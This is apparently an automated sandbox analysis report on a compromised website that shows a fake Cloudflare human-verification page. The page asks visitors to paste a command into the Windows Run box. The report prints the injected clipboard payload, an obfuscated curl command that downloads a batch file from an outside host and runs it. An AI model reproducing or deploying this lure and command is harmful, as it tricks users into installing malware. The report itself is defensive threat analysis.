    Source: global trafficHTTP traffic detected: GET /apc/trans.gif?a596b2323a86f81c2deab48b1814d8ee HTTP/1.1host: l-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
    Source: global trafficHTTP traffic detected: GET /r.gif?MonitorID=asgw&rid=6b06d4dfc1023e0697b7231908f88074&w3c=true&prot=https:&v=20190506&DATA=[{%22RequestID%22:%22arm-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:710,%22T%22:1},{%22RequestID%22:%22arm-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:142,%22T%22:1},{%22RequestID%22:%22o-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:831,%22T%22:1},{%22RequestID%22:%22o-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:153,%22T%22:1},{%22RequestID%22:%22l-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:656,%22T%22:1},{%22RequestID%22:%22l-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:-1,%22T%22:1}] HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
    Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4, i
    Source: global trafficDNS traffic detected: DNS query: digital-watchdog.com
    Source: global trafficDNS traffic detected: DNS query: kanshuwang.top
    Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
    Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
    Source: global trafficDNS traffic detected: DNS query: unpkg.com
    Source: global trafficDNS traffic detected: DNS query: use.fontawesome.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: secure.enterpriseforesight247.com
    Source: global trafficDNS traffic detected: DNS query: dmq883log67hn.cloudfront.net
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: analytics.google.com
    Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
    Source: global trafficDNS traffic detected: DNS query: publickeyservice.pa.gcp.privacysandboxservices.com
    Source: global trafficDNS traffic detected: DNS query: publickeyservice.pa.aws.privacysandboxservices.com
    Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: www.clarity.ms
    Source: global trafficDNS traffic detected: DNS query: www.facebook.com
    Source: global trafficDNS traffic detected: DNS query: c.clarity.ms
    Source: global trafficDNS traffic detected: DNS query: k.clarity.ms
    Source: global trafficDNS traffic detected: DNS query: beacons.gcp.gvt2.com
    Source: global trafficDNS traffic detected: DNS query: beacons.gvt2.com
    Source: global trafficDNS traffic detected: DNS query: beacons2.gvt2.com
    Source: global trafficDNS traffic detected: DNS query: beacons3.gvt2.com
    Source: unknownHTTP traffic detected: POST /ccm/collect?tid=AW-456244667&en=page_view&dl=https%3A%2F%2Fdigital-watchdog.com%2F&scrsrc=www.googletagmanager.com&frm=0&rnd=1875455421.1748615718&dt=Digital%20Watchdog%20l%20Welcome&auid=2004574435.1748615718&navt=n&npa=0&gtm=45be55s2v899007962za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103130498~103130500~103200004~103233427~103252644~103252646~103351869~103351871~104481633~104481635~104559073~104559075&ptag_exp=101509157~103116026~103130498~103130500~103200004~103233427~103252644~103252646~103351869~103351871~104481633~104481635~104559073~104559075&tft=1748615718014&tfd=3380&apve=1&apvf=f HTTP/1.1host: www.google.comcontent-length: 0sec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://digital-watchdog.comx-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49774 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49784 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49785 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.150.240.254:443 -> 192.168.2.16:49786 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.140.254:443 -> 192.168.2.16:49787 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.42.254:443 -> 192.168.2.16:49788 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49789 version: TLS 1.2
    Source: classification engineClassification label: mal64.phis.win@28/107@94/443
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2028,i,17587528478964095806,11073304561506859187,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1964 /prefetch:3
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://digital-watchdog.com"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=2028,i,17587528478964095806,11073304561506859187,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=6172 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2028,i,17587528478964095806,11073304561506859187,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1964 /prefetch:3
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=2028,i,17587528478964095806,11073304561506859187,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=6172 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected

    Persistence and Installation Behavior

    barindex
    Source: screenshotOCR Text: -8 x about:blank Digital Watchdog I Welcome X digital-watchdog.com digital-watchdog.com Verify you are human by completing the action below Verifying... digital-watchdag.com needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray t12e866sg8n Performance and security by Cloudflare 1&35 ENG p Type here to search SG 30/05/2025
    Source: Chrome DOM: 0.5OCR Text: digital-watchdog.com Verify you are human by completing the action below o Verifying... digital-watchdag.com needs to review the security of your connection before proceeding. Complete these verification steps use keyboard To prove you are not robot 1, Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3, Press Enter key on your keyboard Rey t12e866sg8n Performance and security by Cloudflare
    Source: screenshotOCR Text: e about:blank X Digital Watchdog I Welcome digital-watchdog.com digital-watchdog.com Verify you are human by completing the action below Verifying... Recently added Productivity your connection before proceeding. Google Chrome We speak Gmail steps Lise 3D Viewer Office Mail 7-Zip key + R , press Ctrl key + V ur keytoard Microsoft Edge Photos Access 'A Explore VERIFY Adobe Acrobat Alarms & Clack Autolt v3 Microsoft Store s - Musi... WhatsApp c Calculator Calendar Microsoft Films & TV Solitaire Collection Camera o Cortana 866sg8n rity by Cloudflare 1&35 ENG p type here to search o SG 30/05/2025
    Source: screenshotOCR Text: -8 x about:blank Digital Watchdog I Welcome X digital-watchdog.com digital-watchdog.com Verify you are human by completing the action below o Verifying... digital-watchdag.com needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray t12e866sg8n Performance and security by Cloudflare 1&35 ENG p Type here to search SG 30/05/2025
    Source: screenshotOCR Text: e about:blank X Digital Watchdog I Welcome digital-watchdog.com digital-watchdog.com Verify you are human by completing the action below Verifying... Recently added Productivity your connection before proceeding. Google Chrome We speak Gmail steps Lise 3D Viewer Office Mail 7-Zip key + R , press Ctrl key + V ur keyboard IA Microsoft Edge Photos Access Explore Adobe Acrobat VERIFY Alarms & Clack Autolt v3 Microsoft Store s - Musi... WhatsApp Calculator Calendar Microsoft Flims & TV Solitaire Collectim Camera Cortana 866sg8n Excel rity by Cloudflare 1&35 ENG p type here to search SG 30/05/2025
    Source: screenshotOCR Text: e about:blank X Digital Watchdog I Welcome digital-watchdog.com digital-watchdog.com Verify you are human by completing the action below Verifying... Recently added Productivity your connection before proceeding. Google Chrome We speak Gmail steps Lise 3D Viewer Office Mail 7-Zip key + R , press Ctrl key + V ur keyboard IA Microsoft Edge Photos Access Explore Adobe Acrobat VERIFY Alarms & Clack Autolt v3 Microsoft Sthe s - Musi... WhatsApp Calculator Calendar Microsoft Flims & TV Solitaire Collectim Camera Cortana 866sg8n Excel rity by Cloudflare 1&35 ENG p Type here to search SG 30/05/2025
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: C:\WINDOWS\system32\conhost.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.surethinks.com/header.php" -o "C:\ProgramData\fdgfdd.bat" && start /min "" "C:\ProgramData\fdgfdd.bat" Press En
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
    Browser Extensions
    1
    Process Injection
    1
    Process Injection
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    Extra Window Memory Injection
    1
    Extra Window Memory Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
    Ingress Tool Transfer
    Traffic DuplicationData Destruction

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    jsdelivr.map.fastly.net
    151.101.193.229
    truefalse
      high
      beacons3.gvt2.com
      142.250.114.94
      truefalse
        high
        beacons-handoff.gcp.gvt2.com
        74.125.136.94
        truefalse
          high
          dmq883log67hn.cloudfront.net
          3.167.237.66
          truefalse
            unknown
            use.fontawesome.com.cdn.cloudflare.net
            104.21.27.152
            truefalse
              high
              publickeyservice.pa-3.aws.privacysandboxservices.com
              108.156.245.9
              truefalse
                high
                stats.g.doubleclick.net
                173.194.208.154
                truefalse
                  high
                  beacons6.gvt2.com
                  142.251.116.94
                  truefalse
                    high
                    scontent.xx.fbcdn.net
                    57.144.194.128
                    truefalse
                      high
                      vmss-clarity-ingest-eus2-e.eastus2.cloudapp.azure.com
                      172.175.38.6
                      truefalse
                        high
                        code.jquery.com
                        151.101.66.137
                        truefalse
                          high
                          cdnjs.cloudflare.com
                          104.17.25.14
                          truefalse
                            high
                            publickeyservice-a.pa-3.gcp.privacysandboxservices.com
                            34.54.30.30
                            truefalse
                              high
                              gce-beacons.gcp.gvt2.com
                              107.178.242.165
                              truefalse
                                high
                                www.google.com
                                173.194.208.103
                                truefalse
                                  high
                                  stackpath.bootstrapcdn.com
                                  104.18.10.207
                                  truefalse
                                    high
                                    star-mini.c10r.facebook.com
                                    31.13.93.35
                                    truefalse
                                      high
                                      c-msn-pme.trafficmanager.net
                                      20.125.209.212
                                      truefalse
                                        high
                                        beacons2.gvt2.com
                                        173.194.217.94
                                        truefalse
                                          high
                                          beacons.gvt2.com
                                          192.178.131.94
                                          truefalse
                                            high
                                            ax-0001.ax-msedge.net
                                            150.171.28.10
                                            truefalse
                                              high
                                              digital-watchdog.com
                                              54.151.32.244
                                              truetrue
                                                unknown
                                                s-part-0029.t-0009.t-msedge.net
                                                13.107.246.57
                                                truefalse
                                                  high
                                                  kanshuwang.top
                                                  79.141.162.37
                                                  truefalse
                                                    unknown
                                                    googleads.g.doubleclick.net
                                                    142.251.186.157
                                                    truefalse
                                                      high
                                                      analytics.google.com
                                                      142.250.114.100
                                                      truefalse
                                                        high
                                                        td.doubleclick.net
                                                        142.250.114.156
                                                        truefalse
                                                          high
                                                          unpkg.com
                                                          104.18.0.22
                                                          truefalse
                                                            high
                                                            v3-use-appgwv2.eastus.cloudapp.azure.com
                                                            52.146.86.174
                                                            truefalse
                                                              high
                                                              cdn.jsdelivr.net
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                beacons.gcp.gvt2.com
                                                                unknown
                                                                unknownfalse
                                                                  high
                                                                  use.fontawesome.com
                                                                  unknown
                                                                  unknownfalse
                                                                    high
                                                                    c.clarity.ms
                                                                    unknown
                                                                    unknownfalse
                                                                      high
                                                                      k.clarity.ms
                                                                      unknown
                                                                      unknownfalse
                                                                        high
                                                                        www.facebook.com
                                                                        unknown
                                                                        unknownfalse
                                                                          high
                                                                          publickeyservice.pa.gcp.privacysandboxservices.com
                                                                          unknown
                                                                          unknownfalse
                                                                            high
                                                                            www.clarity.ms
                                                                            unknown
                                                                            unknownfalse
                                                                              high
                                                                              connect.facebook.net
                                                                              unknown
                                                                              unknownfalse
                                                                                high
                                                                                publickeyservice.pa.aws.privacysandboxservices.com
                                                                                unknown
                                                                                unknownfalse
                                                                                  high
                                                                                  secure.enterpriseforesight247.com
                                                                                  unknown
                                                                                  unknownfalse
                                                                                    unknown
                                                                                    NameMaliciousAntivirus DetectionReputation
                                                                                    https://digital-watchdog.com/product_detail_assets/Clearance_Zone_button.pngfalse
                                                                                      unknown
                                                                                      https://kanshuwang.top/ls/index.js?c531fe8f142fa15351false
                                                                                        unknown
                                                                                        https://digital-watchdog.com/product_detail_assets/top_nav_icon1.jpgfalse
                                                                                          unknown
                                                                                          https://kanshuwang.top/ls/index.php?akFFGw9Ofalse
                                                                                            unknown
                                                                                            https://digital-watchdog.com/css/style.css?20250530073516false
                                                                                              unknown
                                                                                              https://digital-watchdog.com/js/custom-script.js?20250530073516false
                                                                                                unknown
                                                                                                https://digital-watchdog.com/js/bootstrap-datepicker.js?20250530073516false
                                                                                                  unknown
                                                                                                  https://digital-watchdog.com/product_detail_assets/youtube_orange.pngfalse
                                                                                                    unknown
                                                                                                    https://digital-watchdog.com/assets/dw-topnav-logo.pngfalse
                                                                                                      unknown
                                                                                                      https://digital-watchdog.com/product_detail_assets/facebook_orange.pngfalse
                                                                                                        unknown
                                                                                                        https://secure.enterpriseforesight247.com/js/267707.jsfalse
                                                                                                          unknown
                                                                                                          https://digital-watchdog.com/assets/20220503113243-img-246952568.svgfalse
                                                                                                            unknown
                                                                                                            https://digital-watchdog.com/library/Cookie-Alert/cookiealert.jsfalse
                                                                                                              unknown
                                                                                                              https://digital-watchdog.com/product_detail_assets/top_nav_icon2.jpgfalse
                                                                                                                unknown
                                                                                                                https://digital-watchdog.com/assets/form_loading_new.giffalse
                                                                                                                  unknown
                                                                                                                  https://digital-watchdog.com/js/jquery-phone-inputmask.js?20250530073516false
                                                                                                                    unknown
                                                                                                                    https://digital-watchdog.com/i/fa-angle-down-dark.pngfalse
                                                                                                                      unknown
                                                                                                                      https://digital-watchdog.com/css/dw.css?20250530073516false
                                                                                                                        unknown
                                                                                                                        https://digital-watchdog.com/library/select2/css/select2pp.cssfalse
